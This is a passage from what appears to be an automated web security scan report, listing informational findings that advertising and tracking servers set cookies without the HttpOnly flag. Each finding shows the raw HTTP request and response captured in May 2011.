000001n3o0214hclkxlm50000000u3o020wd7lkze3o0000000m3o02102plkxrxz0000000o3o0210tylkkpku0000001b3o020p1alkze3o0000000m3o0211z1ll3490000000013o0100bvlk9pe80000001j3o0215xylk60qe0000001m3o0210lxlkxrxz0000000o3o02103blkxrxz0000000o3o0210telkd7nq0000001h3o0216rslkxppm0000000s3o020c9slk9pe80000001j3o0213mxlkze3o0000000m3o0212emlkze3o0000000m3o0210rdlkdkly0000001f3o020z9zlkze3y0000000k3o02163plkxlm50000000u3o020z9xlkze3o0000000m3o020m40lkkxrb000000143o020zqylkxrxz0000000o3o020mjelkkxrb000000143o0212qnlkkplt000000193o0212x6lkxrxz0000000o3o0214e9lkze3o0000000m3o021342lkze3y0000000k3o0216aulkze3o0000000m3o0216atlkxlm50000000u3o021203lkb5u20000001i3o02163clkxlm50000000u3o020afqlkze3o0000000m3o020o0vlkkpqx000000163o020z2ilkkxrb000000143o02; Domain=media6degrees.com; Expires=Tue, 08-Nov-2011 13:31:48 GMT; Path=/
Set-Cookie: sglst=2280sbpelkxlm5026sw00f3m000k00500dsnlkxlm505imv00u3o020k0u50uarllkxlm505imv00u3o020k0u50ucg5lkxlm505ikv00s3n000k005009rslkkpke0ieom01c3o020k0v51cam5lkkxr8002zw0153o020k0v515cd4lkxlm5026sw00f3m000k00500crglkxlm505imv00u3o020k0u50ucnolkxlm505ikv00s3n000k00500abelkxlm505ikv00s3n000k00500dd8lkxlm5026sw00f3m000k00500cy2lkxlm505ikv00s3n000k00500aoplkb5u209jqc0063e000j00500cnxlkxlm503s3e00u3o020k0u50ue3qll1dpj01qjh0073o020k07507bq3lkxlm505ikv00s3n000k00500bvplkxlm5026sw00f3m000k00500aoilkxlm503s3e00n3n000k00500942lkb5u20mfs300o3l000k005008ndlkb5u20mfs300o3l000k005009ullkxlm505imv00o3o010k02502bvclkxlm505ikv00s3n000k00500c5flkxlm505ikv00s3n000k0050056blkb5u20mfs300o3l000k00500bjqlkxlm505ikv00s3n000k00500awklkxlm505ikv00s3n000k00500asulkb5u209jqc0063e000j00500crplkxlm503s3e00n3n000k00500asqlkxlm505ikv00s3n000k00500c5rlkov6e0000000x3o020k0v50xaw8lkxlm505imv00u3o020k0u50uc60lkxlm505ikv00s3n000k00500dc4lkxlm505ikv00s3n000k00500d26lkxlm505ikv00s3n000k00500dnjlkxlm505imv00u3o020k0u50ucbclkxlm505ikv00s3n000k00500c85lkxlm505ikv00s3n000k00500csslkxlm505imv00u3o020k0u50uc80lkb5u209jqc0063e000j00500ag2lkd7nq0pwla01h3o020k0v51ec1elkxlm505ikv00s3n000k00500c81lkkpke0cw1r00i3l000k005009grlkxlm505ikv00s3n000k00500c8flkxlm505ikv00s3n000k00500a6slkkpke0cw1r00i3l000k00500dnalkxlm505ikv00s3n000k005009z6lkxlm505ikv00s3n000k00500dbtlkxlm505ikv00s3n000k005009q4lkxlm505ikv00s3n000k00500dyllkxlm505ikv00s3n000k005000kllklhm40c4010053l000k005009q5lkb5u20mfs300o3l000k00500b3zlkxlm503s3e00n3n000k005000t7ljyxb4146xw01p3o020k0v51edgflkkpke0iemm01a3n000k005009mjlkxlm5026sw00f3m000k00500bo0lkb5u20q7vh01b3n000k00500bo1lkkyy00cmo50093l000k005009pglkxlm505ikv00s3n000k00500cwalkxlm505ikv00s3n000k00500d86lklhm40c4010053l000k00500d84lkxlm505ikv00s3n000k00500dqllkxlm505ikv00s3n000k00500dz3lkxlm5026sw00f3m000k00500cm6lkxlm505ikv00s3n000k00500cxdlkxlm505imv00u3o020k0u50u719lkb5u20rycy00y3n000k0050071alkkpke0cw1r00i3l000k00500ctplkxlm505ikv00s3n000k00500cc3lkxlm505ikv00s3n000k00500dgilkb5u209jqc0063e000j00500cthlkxlm505ikv00s3n000k005004wclkb5u20q7vh00t3n000k005005mrlkb5u20mfs300o3l000k00500a0ulkxlm503s3e00n3n000k00500arilkxlm5026sw00f3m000k00500e0yll1dpj000000073o020k07507bwjlkkyy00i5b00133o020k0v513cbplkxlm505ikv00s3n000k005009gelkxlm503s3e00n3n000k00500; Domain=media6degrees.com; Expires=Tue, 08-Nov-2011 13:31:48 GMT; Path=/
Set-Cookie: vstcnt=417k020o01dfngheqnlsvaqf150v10l20r1y4exqe103210524qhoq103210524slly127p20f20g24exp6103210e249v4u10pj10e24ru4y103210722te10tq10a24f69z103210f24n86o103210d24pq44103210a24eflo218e104203210724f204103210524na8i103210e24eyja103210e24mqca103210e24nsyl103210f24l16a218e10f203210l24fz24103210924bgpn103210524o3dr103210l24cj2d103210224e1a9103210l24gqhl103210924d3rk10pj10m23sti21hj10a203210e24g197103210524ns52103210l24fqsv103210l24nnav103210f22wb11m520l20m24uzg6218e100203220020324tfmw103210b24flbl103210424qpgs103210324tc6l103210e24f5tg103210324tmhw103210924q8ci103210l24m4sm103210524elor218e10l203210m24uu1v103210m24f9wk103210i24jxig103210f24ldza127p10n24fvio218e20e20f203210f24uzpw218e10f203210l24eo2u103210624e8bw10321082496o0103210l24fsuv103210924fduc218e10a203210e24ef19103210l24uzdp103210b24dret103210724e9pa10321042451gt10pj10e24styu103210924cnyl103210g24er21103210m24o2lt103210a24fj52103210924m1v2103210a23eoh127p10l24t5cm127p10n24f7qr218e108203210924fgv9218e108203210a24qnab103210023l4f103210a24kd6k103210c24hqyp103210i2; Domain=media6degrees.com; Expires=Tue, 08-Nov-2011 13:31:48 GMT; Path=/
Location: http://bstats.adbrite.com/click/bstats.gif?kid=47763545&bapid=10883&uid=712155
Content-Length: 0
Date: Thu, 12 May 2011 13:31:47 GMT

9.67. http://network.alluremedia.com.au/network/www/delivery/afr.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://network.alluremedia.com.au
Path:   /network/www/delivery/afr.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /network/www/delivery/afr.php?zoneid=10&cb=INSERT_RANDOM_NUMBER_HERE&category=editorialbox&tags=azure HTTP/1.1
Host: network.alluremedia.com.au
Proxy-Connection: keep-alive
Referer: http://www.gizmodo.com.au/2011/05/google-chrome-os-lands-on-hardware-you-can-actually-buy/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAID=6e25a061f3c7b9bf0c10b0e4c1bafdc6

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:31:08 GMT
Server: Apache/2.2.9
X-Powered-By: PHP/5.2.6-1+lenny10
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: CP="CUR ADM OUR NOR STA NID"
Vary: Accept-Encoding
Set-Cookie: OAID=6e25a061f3c7b9bf0c10b0e4c1bafdc6; expires=Fri, 11-May-2012 13:31:08 GMT; path=/
X-Mod-Pagespeed: 0.9.16.9-576
Cache-Control: max-age=0, no-cache, no-store
Content-Type: text/html; charset=UTF-8
Content-Length: 1042

<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.0 Transitional//EN' 'http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd'>
<html xmlns='http://www.w3.org/1999/xhtml' xml:lang='en' lang='en'>
<head>
<ti
...[SNIP]...
9.68. http://network.alluremedia.com.au/network/www/delivery/ajs.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://network.alluremedia.com.au
Path:   /network/www/delivery/ajs.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /network/www/delivery/ajs.php?zoneid=26&cb=74861099127&charset=UTF-8&loc=http%3A//www.gizmodo.com.au/2011/05/google-chrome-os-lands-on-hardware-you-can-actually-buy/ HTTP/1.1
Host: network.alluremedia.com.au
Proxy-Connection: keep-alive
Referer: http://www.gizmodo.com.au/2011/05/google-chrome-os-lands-on-hardware-you-can-actually-buy/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:29:53 GMT
Server: Apache/2.2.9
X-Powered-By: PHP/5.2.6-1+lenny10
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: CP="CUR ADM OUR NOR STA NID"
Vary: Accept-Encoding,User-Agent
Set-Cookie: OAID=e71b29d04affd303b09fd5156424cfb9; expires=Fri, 11-May-2012 13:29:53 GMT; path=/
Content-Type: text/javascript; charset=UTF-8
Content-Length: 52

var OX_651371a0 = '';

document.write(OX_651371a0);
9.69. http://network.alluremedia.com.au/network/www/delivery/lg.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://network.alluremedia.com.au
Path:   /network/www/delivery/lg.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /network/www/delivery/lg.php?bannerid=124&campaignid=69&zoneid=28&loc=http%3A%2F%2Fwww.gizmodo.com.au%2F2011%2F05%2Fgoogle-chrome-os-lands-on-hardware-you-can-actually-buy%2F&cb=a624eca3e9 HTTP/1.1
Host: network.alluremedia.com.au
Proxy-Connection: keep-alive
Referer: http://www.gizmodo.com.au/2011/05/google-chrome-os-lands-on-hardware-you-can-actually-buy/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAID=6e25a061f3c7b9bf0c10b0e4c1bafdc6

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:29:34 GMT
Server: Apache/2.2.9
X-Powered-By: PHP/5.2.6-1+lenny10
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: CP="CUR ADM OUR NOR STA NID"
Set-Cookie: OAID=6e25a061f3c7b9bf0c10b0e4c1bafdc6; expires=Fri, 11-May-2012 13:29:34 GMT; path=/
Content-Length: 43
Vary: User-Agent
Content-Type: image/gif

GIF89a.............!.......,...........D..;
9.70. http://odb.outbrain.com/utils/get  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://odb.outbrain.com
Path:   /utils/get

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /utils/get?url=http%3A%2F%2Fwww.examiner.com%2Ffight-sports-in-national%2Fcomplete-wwe-smackdown-spoilers-for-friday-may-13th-new-face-and-new-feuds&settings=true&recs=true&widgetJSId=AR_1&key=AYQHSUWJ8576&idx=0&version=37740&ref=&apv=false&rand=0.05833011493086815&sig=ITsRLEGg HTTP/1.1
Host: odb.outbrain.com
Proxy-Connection: keep-alive
Referer: http://www.examiner.com/fight-sports-in-national/complete-wwe-smackdown-spoilers-for-friday-may-13th-new-face-and-new-feuds
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _lvs2="uaMqgoSgWEsyZpjyGwNcoLoN1lBMsXDl/XT8eOgMJupcdCqR9LRjXrHG0R5k0w1Cmy75SN8RJIzfjUZTvndAnxUfc7q0DyhK"; _lvd2="27vfag1ZPzfDGaK+UsDEF0v9S/ktpBpl0hVg0CrIJzZ7WZ/pwAclWtc9oa67TDjH3K7ooLp1QJFbCCininxsHoqtNnPoy33i"; _rcc2="c5YqA63GvjSl+Ov6ordflA=="; obuid=ae560ffe-5e98-425c-bc63-febb0fb6e1ae

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: obuid=ae560ffe-5e98-425c-bc63-febb0fb6e1ae; Domain=.outbrain.com; Expires=Sun, 06-May-2012 13:32:37 GMT; Path=/
Cache-Control: no-cache
Pragma: no-cache
Set-Cookie: tick=1305207157807; Domain=.outbrain.com; Path=/
P3P: policyref="http://www.outbrain.com/w3c/p3p.xml",CP="NOI NID CURa DEVa TAIa PSAa PSDa OUR IND UNI"
Set-Cookie: _lvs2="ZkB35ScPKzo2j8RUgljncqwHsEl4200sLz1/RBSGWv7fqe8f2SVyyjsUO0ggTTcNAEWJVItN7uipEAXBPoS5BlV3vvftHFXk"; Version=1; Domain=outbrain.com; Max-Age=33868800; Expires=Thu, 07-Jun-2012 13:32:37 GMT; Path=/
Set-Cookie: _lvd2="27vfag1ZPzfDGaK+UsDEF0v9S/ktpBpl0hVg0CrIJzZ7WZ/pwAclWtc9oa67TDjH3K7ooLp1QJFbCCininxsHmH2CncBjgCUxdPmtmNewbE="; Version=1; Domain=outbrain.com; Max-Age=564480; Expires=Thu, 19-May-2011 02:20:37 GMT; Path=/
Set-Cookie: _rcc2="c5YqA63GvjSl+Ov6ordflA=="; Version=1; Domain=outbrain.com; Max-Age=33868800; Expires=Thu, 07-Jun-2012 13:32:37 GMT; Path=/
Set-Cookie: recs-66cb35a3a34965a97fad3ecb81fa21bf="55fxrxklP2A1i2wT2lqn3xAV/xRnycKLdQQRBzthWayajBy/AWr75gqeEWdmrn/niAKy873kx5zMinVlN2kIxR/R4X5i27VutF0sVigbHjE="; Version=1; Domain=outbrain.com; Max-Age=300; Expires=Thu, 12-May-2011 13:37:37 GMT; Path=/
Content-Type: text/x-json;charset=UTF-8
Vary: Accept-Encoding
Date: Thu, 12 May 2011 13:32:37 GMT
Content-Length: 6914

outbrain_rater.returnedOdbData({'response':{'exec_time':28,'status':{'id':0,'content':'Request succeeded'},'request':{'did':'204759701','req_id':'20af375061d760bdaa910cf7a7a37302'},'score':{'preferred
...[SNIP]...
9.71. http://odb.outbrain.com/utils/ping.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://odb.outbrain.com
Path:   /utils/ping.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /utils/ping.html?random=0.24621318303979933 HTTP/1.1
Host: odb.outbrain.com
Proxy-Connection: keep-alive
Referer: http://www.examiner.com/fight-sports-in-national/complete-wwe-smackdown-spoilers-for-friday-may-13th-new-face-and-new-feuds
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: obuid=ae560ffe-5e98-425c-bc63-febb0fb6e1ae; _lvs2="uaMqgoSgWEsyZpjyGwNcoLoN1lBMsXDl/XT8eOgMJupcdCqR9LRjXrHG0R5k0w1Cmy75SN8RJIzfjUZTvndAnxUfc7q0DyhK"; _lvd2="27vfag1ZPzfDGaK+UsDEF0v9S/ktpBpl0hVg0CrIJzZ7WZ/pwAclWtc9oa67TDjH3K7ooLp1QJFbCCininxsHoqtNnPoy33i"; _rcc2="c5YqA63GvjSl+Ov6ordflA=="

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: obuid=ae560ffe-5e98-425c-bc63-febb0fb6e1ae; Domain=.outbrain.com; Expires=Sun, 06-May-2012 13:32:28 GMT; Path=/
Cache-Control: no-cache
Pragma: no-cache
Accept-Ranges: bytes
ETag: W/"158-1304265382000"
Last-Modified: Sun, 01 May 2011 15:56:22 GMT
Content-Type: text/html
Content-Length: 158
Date: Thu, 12 May 2011 13:32:28 GMT

<html>
   <head>
       <META HTTP-EQUIV="Cache-Control" CONTENT="no-cache">
       <META HTTP-EQUIV="Pragma" CONTENT="no-cache">
   </head>
   <body>
   </body>
</html>
9.72. http://open.ad.yieldmanager.net/a1  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://open.ad.yieldmanager.net
Path:   /a1

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /a1?V=4&pubId=22864454843&site=4491_mysuburbanlife.com&cntTy=js&cTopId=20275001&cDst=_blank&cSctn=Article&tagTy=multi_secure&nAdP=8&rFrame=1&flv=10.2%20r154&cb=1305207031234&url=http%3A%2F%2Fwww.mysuburbanlife.com%2Flyons%2Flifestyle%2Fentertainment%2Fx1539859994%2FTo-do-tonight-Watch-American-Idol-Priest-opens-Friday-the-13th&sz0=1x1&dlv0=ipatf&conTy0=fn_news&cCat0=lyons&sltId0=0&sz1=1x1&dlv1=ipbtf&conTy1=fn_news&cCat1=lyons&sltId1=1&sz2=160x600&dlv2=ipatf&conTy2=fn_news&cCat2=lyons&sltId2=2&sz3=300x100&dlv3=ipatf&conTy3=fn_news&cCat3=lyons&sltId3=3&sz4=300x250&dlv4=ipstf&conTy4=fn_news&cCat4=lyons&sltId4=4&sz5=728x90&dlv5=ipatf&conTy5=fn_news&cCat5=lyons&sltId5=5&sz6=728x90&dlv6=ipbtf&conTy6=fn_news&cCat6=lyons&sltId6=6&sz7=120x60&dlv7=ipatf&conTy7=fn_news&cCat7=lyons&sltId7=7&byt=%3Chead%3E%0A%09%09%0A%09%09%09%3Cbase%20href%3D%22http%3A%2F%2Fwww.mysuburbanlife.com%2Flyons%2Flifestyle%2Fentertainment%2Fx1539859994%2FTo-do-tonight-Watch-American-Idol-Priest-opens-Friday-the-13th%22%3E%0A%09%09%0A%09%09%0A%09%09%09%3Ctitle%3ETo%20do%20tonight%3A%20Watch%20'American%20Idol'%3B%20%22Priest%22%20opens%20Friday%20the%2013th%20%20-%20Lyons%2C%20IL%20-%20Lyons%20Suburban%20Life%3C%2Ftitle%3E%0A%09%09%0A%09%09%0A%09%09%3Cmeta%20content%3D%22Lyons%20Suburban%20Life%20-%20%0A%09Your%20daily%20entertainment%20update%20with%20items%20on%20%26amp%3Bquot%3BAmerican%20Idol%26amp%3Bquot%3B%20tonight%20on%20Fox%2C%20%26amp%3Bquot%3BPriest%26amp%3Bquot%3B%20opening%20on%20Friday%20the%2013th%20and%20a%20recipe%20 HTTP/1.1
Host: open.ad.yieldmanager.net
Proxy-Connection: keep-alive
Referer: http://www.mysuburbanlife.com/lyons/lifestyle/entertainment/x1539859994/To-do-tonight-Watch-American-Idol-Priest-opens-Friday-the-13th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BX=8khj7j56qmjsh&b=4&s=dk&t=128

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:31:47 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Set-Cookie: S=s=4cs7g6d6snoa3&t=1305207107;path=/; expires=
Cache-Control: no-cache, private
Pragma: no-cache
Expires: 0
Connection: close
Content-Type: application/x-multiad-json; charset=UTF-8
Content-Length: 17044


(function(){

var multiAdPack = {
"encoding":"UTF-8",
"version":"1.1",
"reqtype":"ac",
"ads":[
{"ad":"<!-- SpaceID=2022775850 loc=VR noad -->\u000a<img style=\"display:none\" width=0 height=0 alt=\"\
...[SNIP]...
9.73. http://p.brilig.com/contact/bct  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://p.brilig.com
Path:   /contact/bct

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /contact/bct?pid=14CFF267-5CAA-4454-864E-139B5E28A8FB&_ct=iframe&adid=2716&action=1 HTTP/1.1
Host: p.brilig.com
Proxy-Connection: keep-alive
Referer: http://bcp.crwdcntrl.net/px?Yz0zMTMmcHhpZD01ODE1JnB4aWQ9MTAwMSZweGlkPTUzJnB4aWQ9NDcyJnB4aWQ9NjA0MQ%3D%3D
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bbid=AF3T0ZuAGOk4NdOmwmcHrt8jZvpqOmyTfBnhe9lXkrHzvb6m4hSMri5FOCMElW8Qz5pV2zxkbOa8; BriligContact=85cb651d-def1-4cfa-a1e1-8e977f5422e6

Response

HTTP/1.1 200 OK
Cache-Control: no-cache,no-store,must-revalidate,post-check=0,pre-check=0
Content-Type: text/html
Date: Thu, 12 May 2011 13:31:38 GMT
Expires: Mon, 19 Dec 1983 13:31:38 GMT
P3P: CP="NOI DSP COR CURo DEVo TAIo PSAo PSDo OUR BUS UNI COM"
Pragma: no-cache
Server: Apache/2.2.16 (Ubuntu)
Set-Cookie: BriligContact=85cb651d-def1-4cfa-a1e1-8e977f5422e6; Domain=.brilig.com; Expires=Sat, 04-May-2041 13:31:38 GMT
Set-Cookie: bbid=AF3T0Zvf1vDmRq2eOORXBaX-UQvWlgIUZO5XvUBOHKRHkojeDIbMFpwy0k092YGADE_VkxxdKe6RgzLMaIlJXL8-cU29eqJ7Wg; Domain=.brilig.com; Expires=Sat, 04-May-2041 13:31:38 GMT
Vary: Accept-Encoding
X-Brilig-D: D=2778
Connection: keep-alive
Content-Length: 133

<iframe frameborder='0' src='http://r.turn.com/r/du/id/L21rdC8xL21jaHBpZC80/rnd/999?nocache=7814&1=999'width='0' height='0'></iframe>
9.74. http://pbid.pro-market.net/engine  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pbid.pro-market.net
Path:   /engine

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /engine?site=125173;size=1x1;mimetype=img;rnd=(1305207060) HTTP/1.1
Host: pbid.pro-market.net
Proxy-Connection: keep-alive
Referer: http://www.examiner.com/fight-sports-in-national/complete-wwe-smackdown-spoilers-for-friday-may-13th-new-face-and-new-feuds
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: anProfile=-webjz9+0+s0=(3l)+h=5m+1m=1+rv=(-5)+1j=57:1+rt='ADC1D6F3'+rs=c+1f=d+4=2m1

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: CP="NOI DSP COR NID CURa ADMo TAIa PSAo PSDo OUR SAMo BUS UNI PUR COM NAV INT DEM CNT STA PRE LOC"
ANServer: app3.ny
Set-Cookie: anProfile=3seu0d+0+s0=(3l)+h=5m+1m=1+rv=(-5)+rt='ADC1D6F3'+rs=c+1f=d+4=2m1; Domain=.pro-market.net; Expires=Sat, 13-Aug-2011 13:33:23 GMT; Path=/
Pragma: no-cache
Cache-Control: no-cache
Expires: Mon, 1 Jan 1990 0:0:0 GMT
Content-Type: image/gif
Content-Length: 43
Date: Thu, 12 May 2011 13:33:23 GMT
Connection: close

GIF89a.............!.......,...........D..;
9.75. http://pc2.yumenetworks.com/dynamic_btx/115_89795  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pc2.yumenetworks.com
Path:   /dynamic_btx/115_89795

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /dynamic_btx/115_89795 HTTP/1.1
Host: pc2.yumenetworks.com
Proxy-Connection: keep-alive
Referer: http://bcp.crwdcntrl.net/px?Yz00MTYmcHhpZD02MDY4JnB4aWQ9NTQ3JnB4aWQ9NTc3MiZweGlkPTQ2OCZweGlkPTExMzY%3D
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ymdt=0rO0ABXcSAAAEugAAA10AAQAAAOi7eGFI; ymvw=173_193_214_243_18R1PA3QCjJVp0; ymf=0rO0ABXcFAadrgwA*; yumerm=0rO0ABXcMAAAAAQAAAJkAAAAA

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:32:17 GMT
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
YmBtHdr: @BT115_0_0
Set-Cookie: ymbt=0rO0ABXcQAAAAAQAAAHMAAATLAAAAAA**; Domain=.yumenetworks.com; Expires=Mon, 11-Jul-2011 13:32:17 GMT; Path=/
Content-Type: image/gif
Content-Length: 43
P3P: policyref="http://ads.yumenetworks.com/P3P/PolicyReferences.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV"
Connection: close

GIF89a.............!...
...,...........L..;
9.76. http://ping.crowdscience.com/ping.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ping.crowdscience.com
Path:   /ping.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ping.js?url=http%3A%2F%2Fwww.zdnet.com%2Fblog%2Fcomputers%2Fcan-intel-cedar-trail-atom-processors-along-with-google-chromebooks-resurrect-the-netbook%2F5773&id=c2e7cdddce&u=mozilla%2F5.0%20(windows%20nt%206.1%3B%20wow64)%20applewebkit%2F534.24%20(khtml%2C%20like%20gecko)%20chrome%2F11.0.696.65%20safari%2F534.24&x=1305206911608&c=0&t=0&v=0&m=0&cp0=[]&cp1=[J-kzEAoPOk4AAFIsDHEAAABP] HTTP/1.1
Host: ping.crowdscience.com
Proxy-Connection: keep-alive
Referer: http://www.zdnet.com/blog/computers/can-intel-cedar-trail-atom-processors-along-with-google-chromebooks-resurrect-the-netbook/5773
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __csv=6522d442e56f04a6

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:28:57 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7i mod_wsgi/2.7 Python/2.5.2
Set-Cookie: __csv=6522d442e56f04a6; Domain=.crowdscience.com; expires=Wed, 10 Aug 2011 13:28:57; Path=/
Content-Length: 869
P3P: CP="NOI DSP COR NID DEVa PSAi OUR STP OTC",policyref="/w3c/p3p.xml"
Connection: close
Content-Type: text/plain

document.cookie = '__cst=6585ea3a78e49172;path=/';
document.cookie = '__csv=6522d442e56f04a6|0;path=/;expires=' + new Date(new Date().getTime() + 7776000000).toGMTString();
if ('9d96e31a830b9c62'!='1'
...[SNIP]...
9.77. http://pix04.revsci.net/D08734/a1/0/0/0.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pix04.revsci.net
Path:   /D08734/a1/0/0/0.gif

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /D08734/a1/0/0/0.gif?D=DM_LOC%3Dhttp%253A%252F%252Fgoogle.com%252F0.gif%253Fid%253DCAESEIuMZ7FlTxCZ1EPDlWZ8EFI&cver=1 HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.examiner.com/fight-sports-in-national/complete-wwe-smackdown-spoilers-for-friday-may-13th-new-face-and-new-feuds
